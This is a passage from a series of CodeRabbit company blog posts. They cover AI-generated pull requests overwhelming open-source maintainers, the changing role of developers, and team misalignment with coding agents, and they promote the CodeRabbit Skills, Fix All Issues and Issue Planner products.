* **Offline and online benchmarks are designed to disagree.** Code Review Bench built both specifically so they could identify these kinds of gaps in the gold set. As they expand the gold set and calibrate it against real-world behavior, they expect the offline rankings to shift. ## Conclusion We are glad to see this independent confirmation that our approach works in the real world by catching bugs that other review tools miss. We've always believed that the job of a code review tool is to catch as many critical bugs as possible and trust developers to decide which ones matter. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a1e7ac9b54df01c9c91ff3f203652a17896e0e7bbd6eccc3a3c237962a884fc2_69be2bc353.png) We also allow for configurability to tune the kinds of bugs caught based on each team’s needs and improve reviews over time. CodeRabbit is built to be thorough by default while also being configurable for your team’s noise tolerance with controls like Chill vs Assertive review profiles (fewer vs. more comments), path-based instructions, and Learnings to customize your reviews to the issues you want surfaced. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3c2df465e70d106ac9a79424eb9f2d6dbb8df26d5c0d392545a4c549d0f6de52_9f456de88e.png) Martian's Code Review Bench, grounded in real developer behavior, shows that our approach works and is the better choice for teams who want to ship fast (but not break things). We’ll continue to watch how the Code Review Bench results improve over time. In summary: nearly 300,000 PRs, a 53.5% recall rate, and #1 in F1 score. Not on a curated lab test using a static list of known bugs, but based on real-world developer signals. That's what CodeRabbit is built for. Explore the full results and methodology: * [Code Review Bench results](https://withmartian.com/post/code-review-bench-v0) * [Methodology and open source code](https://github.com/withmartian/crb) Interested in trying CodeRabbit? 
[Start your 14-day free trial](https://coderabbit.ai/) today.

AI is burning out the people who keep open source alive

Aleks Volochnev — Sat, 28 Feb 2026 00:00:00 GMT

Over the past few months, one refrain has been heard consistently in open source communities: “AI slop.” It shows up in [LinkedIn discussions from CEOs](https://www.linkedin.com/feed/update/urn:li:activity:7417250625391915009/) who rarely complain publicly. ![Coding agents are ripping apart OSS communities ](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/1cea7f89-776b-4531-9194-23485f81892e.png) It shows up in [Reddit threads](https://www.reddit.com/r/opensource/comments/1q3f89b/open_source_is_being_ddosed_by_ai_slop_and_github/), where users say AI slop has only gotten worse over the past few months. ![GitHub isn't helping OSS projects fight AI slop](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/98cfdc23-407c-4b02-8e17-e90da5cec839.png) And it shows up in [Twitter posts from popular OSS projects](https://x.com/tldraw/status/2011911073834672138?s=20) that have begun automatically closing pull requests from external contributors. ![tldraw shut down PR from external contributors due to AI slop](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/bcd78199-003a-4b72-bffe-2c7d148ae9b5.png) The theme is consistent: projects are being flooded with AI-generated pull requests that merge cleanly but don’t actually work. Some maintainers are adding stricter contribution templates. Others are asking for smaller PRs. A few have temporarily limited new contributors just to regain control of their review queues. This isn’t an anti-AI backlash. Most of the people raising these concerns use AI themselves. Even a prominent figure like Peter Steinberger, the creator of the popular AI agent [OpenClaw](https://openclaw.ai/) (which was recently acquired by OpenAI), is struggling with the overwhelming volume of PRs. 
Despite his own heavy reliance on AI tools, he has [publicly requested a better solution](https://x.com/steipete/status/2023057089346580828?s=46) to manage the pace of incoming contributions. ![OpenClaw drowning in AI Slop pull requests](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/fcaae4a4-e587-4c63-916d-475474f07666.png) ## My own experience: Slop galore As a maintainer of open source projects, I integrated AI into my coding process. Initially, this combination felt ideal as development gained momentum, contributors submitted fixes faster, and issues were addressed more consistently. Open source development felt invigorated; problems that once took months were now resolved in hours. This speed was beneficial when AI augmented human judgment. However, as the focus moves toward fully automated agents, a crucial element is diminishing. The issue with many of these automated pull requests isn't syntax but a failure of judgment. What I didn’t expect was how much time I would start spending reviewing pull requests. That wasn’t because contributors suddenly got worse, or because AI made people careless. It was because writing code stopped being the hard part. Open source has always depended on the hard parts to act as a natural filter on what gets proposed, reviewed, and ultimately merged. ## Open source PRs are coming faster, but maintainers are still human Surveys like [Stack Overflow’s Developer Survey](https://survey.stackoverflow.co/) show that a large majority of developers (80%) already use, or plan to use, AI coding tools. You don’t need a report to feel that shift, though; you can see it immediately in active repositories. Pull requests arrive faster, they tend to be larger on average, and they often carry the unmistakable shape of something generated from a single prompt or a short back-and-forth with a model. 
That isn’t a criticism. I use AI tools every day myself and I would be lying if I said I wanted to go back to the way things were before. This is simply what happens when contribution becomes cheap. The problem many open source maintainers are running into is that reviewing those contributions did not get the same speed boost, and it has become more cognitively demanding. I have seen pull requests that introduce a brand-new abstraction layer to solve what was previously a five-line change, complete with interfaces, helpers, and configuration flags that technically work but dramatically increase complexity. Nothing is “wrong” in the obvious sense. The surface-level checks (passing tests and a green CI) suggest no obvious errors. However, the reviewer's burden increases significantly; they must now decipher not only what changed, but also the rationale behind the specific implementation chosen and whether it subtly contradicts long-standing architectural decisions. ## Why reviewing AI-generated code feels harder Reviewing AI-generated code is strange because it often looks correct at first glance. The formatting is clean, naming is reasonable, and the logic flows in a way that feels intentional. Yet, you find yourself slowing down, because something does not quite sit right. You start asking questions that are hard to answer quickly. * Why does this abstraction exist at all? * Why does this function do three things instead of one? * Why does an approach technically work but feel fragile under real-world conditions? A frequent issue I've observed is with error handling in AI-generated code. For instance, I've reviewed changes where the AI catches and logs every conceivable exception. While this appears robust on the surface, in reality, it can mask critical failures that other parts of the system rely on to be visible. The change functions correctly in isolation but introduces subtle flaws by violating system-wide assumptions. 
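A minimal Python sketch of that failure mode follows. Everything in it is hypothetical (the `fetch_balance_*` functions, the `LedgerUnavailable` exception, the retrying caller); it only illustrates how a catch-all handler can look fine in isolation while hiding a failure the caller depends on seeing.

```python
import logging

logger = logging.getLogger("billing")


class LedgerUnavailable(Exception):
    """Hypothetical error that callers rely on to trigger a retry."""


def read_ledger(account_id: str) -> int:
    # Stand-in for a real lookup; in this sketch it always fails.
    raise LedgerUnavailable(f"ledger down while reading {account_id}")


def fetch_balance_swallowing(account_id: str) -> int:
    """Catch everything, log it, and carry on with a default value."""
    try:
        return read_ledger(account_id)
    except Exception:
        logger.exception("could not fetch balance")
        return 0  # The outage now looks like a legitimate zero balance.


def fetch_balance_propagating(account_id: str) -> int:
    """Log for context, but keep the failure visible to the caller."""
    try:
        return read_ledger(account_id)
    except LedgerUnavailable:
        logger.warning("ledger unavailable for %s", account_id)
        raise


def caller_should_retry(fetch) -> bool:
    """Downstream code that schedules a retry only if it sees the failure."""
    try:
        fetch("acct-1")
    except LedgerUnavailable:
        return True
    return False


print(caller_should_retry(fetch_balance_swallowing))   # False
print(caller_should_retry(fetch_balance_propagating))  # True
```

Both versions log the problem, and both would pass a unit test that only checks "does not crash." Only the second preserves the contract the caller was built around, which is the kind of context a reviewer has to carry in their head.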
Catching that kind of issue requires knowing how downstream components expect failures to propagate, which is rarely written down. Those are not questions a linter answers, and they are not always questions a contributor can explain either, especially when they do not fully own the context behind the change. Most open source projects rely on a large amount of implicit knowledge that never makes it into documentation. There are old design decisions buried in issues from years ago, conventions enforced socially rather than technically, and trade-offs that only make sense if you remember why something was done a certain way in the first place. AI does not know any of that unless someone teaches it and contributors often do not know it either. That gap is where much of today’s review friction lives. ## The real cost lands on maintainers Research on open source sustainability has shown for years that a [tiny percentage of contributors do the majority of review](https://arxiv.org/html/2312.17236v1#:~:text=Figure%201%3A,area%20of%20B.) work. So, in open source, this kind of review almost always falls on the same small group of people. You see the same names over and over again on merged pull requests. Maintainer burnout did not start with AI, but AI made it more visible by removing many of the buffers that once kept it manageable. More pull requests come in. Fewer of them are obviously wrong. Each one requires more careful mental simulation to feel confident it will not cause problems later. That often means scrolling through files, replaying edge cases in your head, and asking yourself what you are about to miss this time. It is slow, quiet work, and does not scale well. As the effort required for review outpaces the availability of reviewers, projects suffer a gradual decline rather than an abrupt failure. The symptoms include slower responses and accumulating unresolved issues. 
This eventually discourages contributors, who cease participation due to the lack of timely feedback. What is interesting is that many projects have started adapting without making a big announcement about it. You see stricter automated checks appear, clearer expectations for pull request descriptions, and more effort spent validating changes earlier in the process, before a maintainer ever looks at them. Reviews are moving earlier in the workflow not because maintainers want to be gatekeepers, but because human attention is limited and expensive. It makes more sense to spend it on intent and design than on catching avoidable mistakes. ## AI didn’t break open source, it exposed the bottleneck AI didn’t break open source. It exposed what was already straining under the surface: [reading code is harder than writing it](https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it#https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it?heading-reading-code-is-actually-harder-than-writing-it), especially when AI writes most of it. The real shift wasn’t just faster generation. It was volume. Suddenly, maintainers weren’t reviewing a handful of thoughtful pull requests each week. They were reviewing AI-generated diffs at a pace no human brain signed up for. Writing got easier. Reviewing got exponentially harder. That’s where AI code reviews started to make sense to me - not as a vague “AI assistant,” but as an always-on reviewer that runs before a human ever has to burn cognitive energy on a PR. When I started using CodeRabbit on my open source projects, it caught the obvious things immediately: off-by-one errors in pagination logic, missing error handling around external calls, subtle edge cases that only fail under specific configurations, and security issues that would have been painful to debug after a release. It flagged missing tests that technically “worked” but weren’t defensible. 
It forced contributors, including myself, to clean up code before asking for human reviewer time. Instead of spending my energy scanning for logic bugs or basic security issues, I could focus on intent. * Does this align with the project’s direction? * Does this abstraction make sense long term? * Is this the right tradeoff? The AI handled the mechanical correctness checks so humans could stay strategic. In my experience, automating feedback early in the pull request process speeds things up and reduces review cycles. When contributors know their PR will get AI code review feedback instantly, they submit smaller changes, write clearer descriptions, and fix obvious issues before a maintainer ever looks at them. The turning point for me was realizing the reviews weren’t just “nice to have.” They were protecting my reputation. If AI was writing a growing share of my code, I needed AI reviewing it with the same rigor, before it hit the repo. That’s ultimately why I joined CodeRabbit. The quality of the reviews, the codebase awareness, the ability to run checks locally in the IDE before pushing: together, they solved the exact bottleneck I was feeling in open source. AI code generation scaled output. AI code reviews scaled judgment. Open source didn’t need less AI. It needed AI in the right place in the workflow. And when reviews move left, before the pull request and before human fatigue sets in, maintainers get their time back for what actually matters: design, direction, and shipping software that doesn’t wake you up at 2 a.m. ## Why CodeRabbit helps prevent OSS burnout Open source does not collapse because of bad code. It collapses because a handful of maintainers end up reviewing everything. AI made that imbalance worse. Contributors can now generate fixes, refactors, and feature PRs in minutes. Review still happens at human speed. The result is predictable: more notifications, longer queues, and maintainers spending nights and weekends doing unpaid triage. 
Burnout in open source rarely looks dramatic. It looks like this: * PRs sitting unreviewed for weeks. * Maintainers closing issues with “won’t fix” because they simply do not have time. * Fewer thoughtful reviews and more rubber stamps just to clear the backlog. * Talented maintainers quietly stepping back. That is not a tooling problem. It is an attention problem. CodeRabbit helps by acting as a first-pass reviewer that never gets tired and never rushes through a diff. It reviews every pull request line by line, checks for logic errors, edge cases, security risks, and cross-file impact, and flags issues before a human even opens the tab. For maintainers, that changes the shape of the work: * Instead of scanning for obvious bugs, you focus on architecture and intent. * Instead of manually checking for missed requirements, you validate higher-level decisions. * Instead of absorbing every small fix yourself, contributors address AI feedback before requesting review. ## CodeRabbit’s commitment to OSS CodeRabbit is committed to supporting open source software, having pledged [$1 million in sponsorships](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source). We rely heavily on open source technology and fundamentally believe that CodeRabbit's AI is a tool to assist, not replace, the vital role of open source maintainers. It absorbs the repetitive, error-prone parts of review so humans can spend their limited energy where it matters most. Open source survives on people. If AI is going to increase code volume, we need something equally consistent helping with review. Otherwise, the cost stays concentrated on the same few maintainers until they burn out. If you maintain an open source project and your review queue keeps growing, [try CodeRabbit](https://coderabbit.ai/) on your next repository. CodeRabbit is free for open source. 
Every maintainer, contributor, and community can use our platform to cut through PR noise, automate code quality checks, and free up more time for meaningful contributions.

CodeRabbit Skills: Give your AI agent code review instincts

Konrad Sopala — Wed, 25 Feb 2026 00:00:00 GMT

AI agents can write code, they can refactor code, they can even explain code. But they don’t review code like a senior engineer. They don’t consistently look for subtle bugs. They miss security risks. They don’t always group issues by severity or help you fix them in a structured way. That’s the gap [CodeRabbit Skills](https://github.com/coderabbitai/skills) are designed to close. ## What are CodeRabbit Skills? [CodeRabbit Skills](https://github.com/coderabbitai/skills) let your AI coding agent initiate CodeRabbit-powered code reviews directly from your local environment, CLI, or IDE. Once installed, you can simply tell your agent things like: ```plaintext Review my code Check for security issues Review my PR What's wrong with my changes? Run a code review ``` Your agent will automatically work with the CodeRabbit CLI to run a CodeRabbit review and return structured findings. No switching tools. No opening GitHub. No manual setup every time. Just ask and your agent reviews. ## What actually happens when your agent runs a CodeRabbit Skill? When your agent invokes the CodeRabbit code review skill, it initiates a CodeRabbit review through the CodeRabbit CLI tool. 
Specifically, it will:

* Analyze your changes for bugs, security issues, and anti-patterns
* Group findings by severity (critical, warning, info)
* Suggest concrete fixes and improvements
* Support iterative fix-and-review workflows

## Works with the agents you already use

[CodeRabbit Skills](https://github.com/coderabbitai/skills) work across a wide ecosystem of coding agents, including:

* Claude Code
* Codex
* Cursor
* GitHub Copilot
* Gemini CLI
* Continue
* Windsurf
* And [30+ more](https://github.com/coderabbitai/skills?tab=readme-ov-file#supported-agents)

## Install in under 30 seconds

Setup is intentionally simple:

```plaintext
# Install CodeRabbit CLI
curl -fsSL | sh

# Authenticate
coderabbit auth login

# Install the skill
npx skills add coderabbitai/skills
```

Now, your agent can run real CodeRabbit reviews locally. That’s it.

## Try CodeRabbit Skills today

Install CodeRabbit Skills and get real code review right where you work: [https://github.com/coderabbitai/skills](https://github.com/coderabbitai/skills)

Ask your agent to have CodeRabbit review your code and see what it catches.

Fix all issues with AI Agents – a quality of life improvement

Konrad Sopala — Thu, 19 Feb 2026 00:00:00 GMT

Code review is where you catch the things you missed. Fixing them shouldn’t feel like Groundhog Day. CodeRabbit already flags issues in your pull requests and gives you ready-to-use prompts for your AI coding agents. You click Prompts for AI, copy the prompt, run it in your IDE or CLI, and move on.

That works great – until your PR has a lot of issues to fix. When your PR has 12 issues, you’re suddenly doing a lot of copy, paste, run, and repeat. The fixes are fast, but the workflow isn’t. That’s why we built **Fix All Issues with AI Agents** for our git-based reviews, a simple improvement that lets you resolve every CodeRabbit-reported issue in one pass.

## Fix everything in one step

%[https://youtu.be/h7bz4lvELCI]

When CodeRabbit reviews your pull request, it surfaces precise issues directly in the GitHub PR interface. Previously, each issue included a **Prompt for AI Agents** that told your agent exactly what to fix, so a long review meant repeating the same copy-and-run steps for every issue. We knew the repetition was slowing you down. So, we fixed it.

Now, when CodeRabbit completes a review, you’ll see a new option: **Fix All Issues with AI Agents**.

![fix all issues with AI agents](https://victorious-bubble-f69a016683.media.strapiapp.com/35bf6d5cb0bcca5449c524f9d4c35980e7b64c6eda743f83a95558922fb6fb1f_cb96a9077d.png)

Click it and CodeRabbit will:

* Collect every fix prompt from the review
* Combine them into a single, structured instruction
* Give you one prompt to copy
* Let your AI agent fix everything in one run

That’s it. Copy once. Run once. Review the changes. No manual stitching. No missed fixes.

## Why this improves your daily workflow

This feature doesn’t change what CodeRabbit finds. It changes how fast you can act on it. You get:

* Less copy-paste busywork
* Faster iteration on PRs
* Fewer chances to miss issues
* A smoother path from review to merge

It’s a small change, but it removes one of the most annoying parts of working with AI agents in code review. And better yet, it delivers all the context to your agents.
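As a rough illustration of the collect-and-combine step, the sketch below merges several per-issue prompts into one numbered instruction. It is not CodeRabbit's implementation: the `FixPrompt` type, its fields, the `combine_fix_prompts` function, and the output format are all hypothetical, chosen only to show the idea.

```python
from dataclasses import dataclass


@dataclass
class FixPrompt:
    """One per-issue prompt. Field names are hypothetical, for illustration only."""
    file: str
    line: int
    instruction: str


def combine_fix_prompts(prompts: list[FixPrompt]) -> str:
    """Merge per-issue prompts into one numbered instruction, ordered by file and line."""
    if not prompts:
        return "No issues to fix."
    # Sorting keeps fixes for the same file next to each other.
    ordered = sorted(prompts, key=lambda p: (p.file, p.line))
    lines = ["Fix all of the following review issues in one pass:", ""]
    for number, prompt in enumerate(ordered, start=1):
        lines.append(f"{number}. {prompt.file}:{prompt.line} - {prompt.instruction}")
    return "\n".join(lines)
```

Ordering by file and line is one possible design choice; it lets an agent work through each file once instead of jumping back and forth between files.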
AI agents work best when they have full context. This feature gives them exactly that. Instead of feeding your agent fragmented instructions, you provide a complete set of fixes in one prompt. This makes the process faster, smoother, and easier to manage. Which helps you stay in flow and ship more. ***Try Fix All Issues with AI Agents in your next pull request and spend less time managing prompts – and more time shipping.***

Developers are dead? Long live developers.

David Loker — Thu, 12 Feb 2026 00:00:00 GMT

Predictions about the end of programming are nothing new. Every few years, someone confidently announces that *this* time developers are **truly** finished. If you listened to these self-proclaimed Nostradamuses, devs were previously set to be replaced by everything from compilers ("If a machine writes the instructions, what's left for humans to do?") to low-code, no-code tools ("Why hire developers when your VP can drag-and-drop an enterprise app?") to visual programming (“It looks like a flowchart, so it’s going to eliminate programming altogether”). This time, the executioners are AI coding agents. Executives, founders, and tech influencers are lining up to tell the world that software engineers are living on borrowed time, that within a year or two, AI agents will write all the code, humans will step aside, and “developers” will join the long list of roles rendered obsolete, like telephone switchboard operators or video rental clerks. They’re not entirely wrong. AI will indeed write much more of the code in a year or two, maybe even all of it for certain kinds of tasks. But rest assured, those sharing these takes are coming to the wrong conclusions. ## **“The king is dead. Long live the king.”** The phrase *“the king is dead, long live the king”* dates back to medieval Europe. It was announced at the moment of a monarch’s death to affirm continuity: one king has fallen, but the institution of kingship lives on in his successor. Applied to software engineering, the message is similar. The old model of developers is, indeed, dying out. In a few years, you won’t find devs who spend their days hand-writing syntax and carefully constructing every loop, import, and conditional. But the developer role itself isn’t disappearing. This isn’t an extinction event, it’s a succession. ## **It’s the end of developers as we know it (and you should feel fine)** The historical track record of “developers are finished” takes isn’t great. 
Every new abstraction triggers the same Twitter and media discourse: confident pronouncements, sweeping generalizations, and a level of certainty usually reserved for end-of-the-world cults. And yet, somehow, the world keeps running. In hindsight, these predictions look less prophetic and more like Silicon Valley’s version of Chicken Little. The story always ends the same way: declare developers dead, dramatically increase the demand for software, and then hire more developers than before. Only now, with better tools and bigger problems. Because the thing people forget is that each time abstraction rose, developers adapted. As **Grady Booch** put it on X recently: [![](https://victorious-bubble-f69a016683.media.strapiapp.com/ddb3a2047db5936d9e2b7af0439fdafb83230a23ca882f0f53039cdd21e83410_8a5ec6236a.png)](https://x.com/Grady_Booch/status/2013331606795362398) Others have been more blunt. One widely shared take summed it up this way: [![](https://victorious-bubble-f69a016683.media.strapiapp.com/4487fb536f361018c7de37d5c5d5e767f70342e6562194da8b76cc3f548fb3b0_365eb79e84.png)](https://x.com/rough__sea/status/2013280952370573666) If you squint, these statements sound apocalyptic. But read carefully, and they’re actually saying something very different. They’re not claiming engineers stop existing. They’re claiming *how* software gets written is fundamentally changing. And they’re right. ## **What’s *actually* dying: Manual syntax production** AI is getting very good at generating code. Large chunks of application logic that once required careful human authorship can now be produced automatically. Boilerplate, glue code, scaffolding, even moderately complex algorithms are increasingly cheap to generate. That means some code simply won’t be written directly by humans anymore in the future as AI improves. But not all of it. 
Even in a world where AI coding bots could potentially take over your job completely, they likely wouldn’t be trusted with things that we prefer human judgement around like: * Critical systems * Performance-sensitive paths * Novel architectures * Ambiguous or underspecified domains These still demand deep human judgment. And even when AI writes the code, it doesn’t mean the human role disappears. It just shifts. ## **Shift 1: From writing code to *knowing what good looks like*** One tweet captured this change succinctly: [![](https://victorious-bubble-f69a016683.media.strapiapp.com/5a4fedcf5e1e07515ecab2b997b7115d024e1aab0a5c4cadc27fff7f89a13378_3de6fa9633.png)](https://x.com/thiagotm/status/2013309376988131537?s=20) This is the uncomfortable truth about AI code generation: it is extremely confident, often persuasive, and occasionally very (elegantly) wrong. Catching those failures requires more, not less, expertise. You don’t review AI-generated code by just checking syntax. You review it by asking: * Does this match the intent? * Are the assumptions sound? * Does this fail safely? * What happens at the edges? * Is this maintainable six months from now? That’s not junior work, that’s senior judgment. And while we at CodeRabbit have created AI code reviews to help make the job of parsing AI code easier and catch bugs humans often miss, we don’t claim to be able to take a human out of the loop. A human developer is critical for catching business logic mistakes and other key nuances that AI isn’t able to. We just make their job of reviewing large volumes of AI generated code less overwhelming and, therefore, capable of scaling. ## **Shift 2: From coding, *then* reviewing to reviewing intent first** As AI systems take on more of the work of producing code, the most important human contribution shifts upstream. Code validation won’t start at the PR stage anymore, it will start before the code is actually written by reviewing the intent and plan. 
This is where prompt reviews are set to become central. With AI writing most of the code, developers will increasingly focus on things only they can do like: * Decomposing ambiguous problems * Understanding business goals or feature design * Specifying interfaces and acceptance criteria * Defining constraints and non-goals before anything is generated * Providing the right context at the right time * Building tight feedback loops * Designing for safety (security, privacy, reliability) * Setting success criteria that can be evaluated after the fact * Reviewing outcomes against original goals, not just surface correctness That’s a lot of work when teams have to keep pace with the speed of coding agents. And that involves being extremely clear about intent early on and ensuring alignment. After all, misunderstood intent or lack of alignment is what causes rework and delays at the PR review or testing stage. Ambiguity is what produces brittle systems. Poorly articulated goals are what lead AI to generate large volumes of code that look reasonable, behave correctly in the happy path… and quietly miss what actually matters. Prompt review is therefore set to become a key part of the SDLC in the next few years where alignment is validated *before* generation. That will involve: * Checking whether assumptions are explicit or merely implied * Making tradeoffs visible instead of accidental * Ensuring that “done” is defined, not guessed at * Validating that the output matches intent In that world, planning and review converge into a single responsibility: shaping the problem so the system has a chance of solving the right one. The developers who thrive won’t be the ones who can coax the most lines of code out of a model. They’ll be the ones who can express intent precisely, recognize when outputs drift from it, and intervene early as a team to get alignment, before small misunderstandings scale into large, expensive failures. 
## Why we created CodeRabbit Issue Planner %[https://youtu.be/zHlgipben70?si=MUCX6v86faep6DmM] This shift toward an intent-first workflow isn’t theoretical for us. It’s what we’ve been seeing play out with teams using CodeRabbit. As AI accelerates code production, we’ve increasingly seen bottlenecks at the code review stage due to the volume of code AI was helping write and the number of issues it was adding to that code. Our recent study found that [AI added 1.7x more bugs](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) and issues to code than humans did. But, from what we saw, we believed that the real problem wasn’t just AI coding agents but how teams were working with those agents. Prompts were vague. Assumptions were implicit. Context lived in people’s heads or scattered Slack threads. Often AI was left to fill in the gaps and did so confidently but wrongly, leading to more work at the review stage. What’s more, there was now a cold start problem: it became onerous and time-consuming to draft the requirements into a prompt that included all the assumptions, specs, and context the AI needed to understand and properly execute the work. That’s the problem that our CodeRabbit Issue Planner is designed to address. It supports developers in turning ideas into concrete, reviewable plans that are digestible by AI coding agents. It surfaces assumptions, clarifies scope, defines constraints, and makes tradeoffs explicit *before* generation begins. Importantly, Issue Planner doesn’t make judgment calls on behalf of developers like a coding agent might do if it made a plan itself. It doesn’t decide what “good” looks like. It doesn’t replace architectural thinking or product understanding. It creates an editable first draft of a prompt that can be reviewed by anyone on the team to create space for alignment and visibility earlier and to help support decision-making. 
That’s because as code generation becomes faster and cheaper, the value of developers concentrates around intent, judgment, and alignment. CodeRabbit’s planning product is built to support that reality. It helps developers focus more on judgment and strategy, helps them catch misunderstandings sooner, and keeps them firmly in control of how they use AI in order to improve output and reduce rework later on in the development process. ## Developers aren’t going away. Somewhere right now, a CEO or two is likely polishing keynote slides about “the end of developers.” If history is any guide, they're going to be very disappointed. Not because AI won’t change software engineering (it already has) but because they’re mistaking a transformation for an extinction. What’s ending is a particular image of the developer: hunched over syntax, manually assembling every loop and conditional, measured by lines of code and hours spent typing. But the role of *developer* isn’t vanishing. It’s shedding a skin. The future developer: * Works at higher levels of abstraction * Defines intent rather than typing syntax * Reviews systems and outcomes, not just lines of code * Acts as the final arbiter of correctness, safety, and alignment As AI takes over the mechanics of production, more responsibility, not less, falls on the humans in the loop. Someone still has to decide what should be built, what constraints matter, what risks are acceptable, and whether the result actually solves the right problem. That work can’t be automated away, because it’s grounded in judgment, context, and accountability. So yes, developers, as we once knew them, are dying out. But long live developers. 👑 ***Interested in learning more about how we help devs in this new era?*** [***Try CodeRabbit reviews and Issue Planner today!***](https://coderabbit.link/8cjC8ui)

Misalignment: The hidden cost of AI coding agents isn't from AI at all

Gur Singh — Tue, 10 Feb 2026 00:00:00 GMT

***TL;DR:*** *The real cost of AI agents isn’t tokens or tools; it’s misalignment that shows up as rework, slop, and slowed teams.* ## **The conversation everyone is having (and why it misses the point)** Most conversations about AI coding agents sound like a fantasy football draft. * Which model is better at autonomous coding? * Which one topped the benchmarks this week? * Which one “reasons” better? These debates take over blog posts, launch threads, and Slack channels everywhere. Devs on Twitter compare outputs line by line, argue over microscopic differences in reasoning quality, and swap models like they’re changing themes. Surely, *this* one will fix it. But for most teams, these differences aren’t what determine whether AI actually helps them ship faster. When AI-generated code goes sideways, it’s not typically because the model wasn’t smart enough. It’s because the agent had no idea what you really wanted. The code can be perfectly valid, logically sound, and honestly impressive… and still be completely wrong for your team, your codebase, or your product. That gap shows up as rework. Or repeated prompt tweaks. Or long review threads explaining intent after the fact. Or worse, developers spending more time correcting AI output than they would have spent writing the code themselves. Turns out, we’ve all been optimizing for model quality but forgot to measure drift. The most important factor in your success with AI agents isn’t which model you picked but how you’re adopting it as a team. Because turns out misalignment is the quiet, compounding problem that slowly eats your time while everyone’s busy arguing about benchmarks. ## **Speed exposed an existing problem** Before AI agents, misalignment was annoying… but survivable. Writing code took time. If requirements were fuzzy or assumptions were wrong, you usually discovered it halfway through writing the code or maybe during review. The feedback loop was slow, but forgiving. 
Humans hesitated, they asked questions, and then course-corrected as they went. But now? When an agent can generate hundreds or thousands of lines of code in seconds, it doesn’t stop to check whether your requirements were vague. It doesn’t ask clarifying questions. It doesn’t say, “Hey, this seems underspecified.” It just… goes. Confidently. In whatever direction it decides you likely intended. What used to be a small misunderstanding becomes a massive diff to review. What used to be a quick clarification turns into a full rewrite. And suddenly you’re staring at a PR thinking, “Technically, this is correct. Practically, it’s unusable.” This is why teams feel like AI made them both faster *and* slower. Execution is instant. Correction is not. The faster the agent, the more expensive unclear intent becomes. ## **The overlooked tax: AI rework** When AI output is bad, it rarely looks like failure. Instead, it looks like *iteration*. You run the agent. The result is close but not quite right. So, you tweak the prompt. Then, you tweak it again. You add more context. You clarify one edge case. You re-run the agent. And then you repeat. That’s progress these days. Each cycle feels small. But stack enough of them together and suddenly you’ve spent an hour rewriting prompts, reviewing generated code, and explaining intent without actually moving the work forward. It’s also a tax that can hit teams unevenly. Not everyone is an expert at writing prompts for coding agents. A few people on your team might be great at it but no teams are stacked entirely with prompting experts. Some might be prompting efficiently and effectively while others waste hours trying to rework things after the fact. 
Rework can show up as: * Long PR threads clarifying decisions that were never made explicitly * Code that technically passes tests but violates team conventions * Engineers quietly thinking, *“I could’ve just written this myself”* and deciding not to use AI the next time, reducing AI adoption across teams. The worse the alignment, the higher the tax. Every missing assumption gets paid for in re-prompts, reviews, and rewrites. Or worse, it leads to bugs and downtime in production. And unlike a failed build or a flaky test, this cost doesn’t always trip alarms. It just eats time quietly. ## **Misalignment doesn’t stay contained. It compounds.** Misalignment early in the workflow doesn’t just cause one problem: it causes a chain reaction. When intent isn’t clear up front, the agent fills in the gaps. That leads to code that’s *almost* right, close enough to look reasonable, but wrong enough to create work everywhere else. Suddenly, reviews are harder, tests are more complicated, and you’re having to rewrite half the PR yourself. What should’ve been a small clarification becomes a long review thread. What should’ve been a quick decision becomes a follow-up meeting. And what should’ve been a clean change becomes a series of patches trying to reconcile what the code does with what the team *meant*. Misalignment discovered early is cheap. Misalignment discovered late is expensive. Once code exists, every correction has a blast radius. You’re not just fixing intent, you’re undoing structure, refactoring assumptions, and explaining decisions that were never made explicitly by a human in the first place. AI doesn’t create this problem. It accelerates a problem that’s inherent in creating software: unclear intent and unaligned expectations. In the past, this was solved by a quick conversation to clarify. But because agents move so fast, they push misalignment downstream at full speed. By the time a human steps in, the cost has already multiplied. 
You’re no longer deciding *what* to build, you’re negotiating with code that already exists. ## **The real solution: Collaborative planning** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a6292f20e471bfcf47b0bb3721a158d7130c71d6980f71c576210c72f95a59f3_ba8c4bfc54.jpg) Collaborative planning moves the hardest decisions to the moment when they’re still cheap: before code exists. You need to tackle them before agents start guessing and before assumptions get baked into hundreds or even thousands of lines of output. Instead of one person silently deciding what “good” looks like and encoding it into a prompt, or worse, leaving it to the agent, teams agree on it upfront. Scope is explicit, assumptions are visible, and success criteria are shared. Intent stops living in someone’s head and starts living in an artifact the whole team can review. This changes the whole process. Agents stop improvising, reviews get lighter, and rework drops dramatically. Collaborative planning isn’t about slowing teams down or adding process. It’s about preventing the kind of misalignment that quietly drains time later. A few minutes of alignment upfront can save hours of cleanup downstream. ## **Why we built CodeRabbit Issue Planner** %[https://youtu.be/zHlgipben70] We didn’t wake up one day and decide to get into planning. We followed the failures. For years, CodeRabbit has lived where problems from AI coding agents show up most clearly: in reviews. We’ve seen the same patterns repeat across teams, languages, and stacks, especially as AI agents became part of everyday workflows. The issues weren’t subtle. We saw generated code that technically worked but missed the point, long PR threads explaining decisions no one remembered making, and repeated fixes for assumptions that should’ve been surfaced earlier. In fact, our recent study found that issues show up [1.7 times](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) more often in AI-generated code than in human-written code. 
